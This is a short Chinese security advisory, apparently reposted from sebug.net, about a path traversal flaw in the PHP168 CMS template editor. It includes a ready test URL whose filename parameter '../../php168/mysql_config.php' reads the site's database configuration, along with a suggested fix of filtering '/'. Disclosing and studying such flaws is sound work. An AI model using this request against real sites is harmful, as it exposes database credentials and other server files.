« 上一篇下一篇 »

PHP168后台查看/修改任意文件漏洞

影响版本:
PHP168所有带模板编辑的版本
漏洞描述:
PHP168整站系统一直以来受广大用户的亲睐,它凭借着自身的强大、稳定、安全、灵活、<p>

易用等多方面的优势 ... 架构与功能的不断完善,让PHP168成为了最主流CMS系统之一。由于admin/

style.php代码过滤不严,存在漏洞

测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
要求能进入网站后台<p>http://网站地址/后台目录/index.php?lfj=style&job=editcode&

keywords=default&filename=../../php168/

mysql_config.php <p>可以获取网站php168/mysql_config.php配置信息,当然也可以换成别的

SEBUG安全建议:
临时解决办法:
过滤“/”符号
// sebug.net
  • 相关文章:
  • 留言列表:
控制面板
网站分类
搜索
文章归档
友情链接
最近发表
Tags列表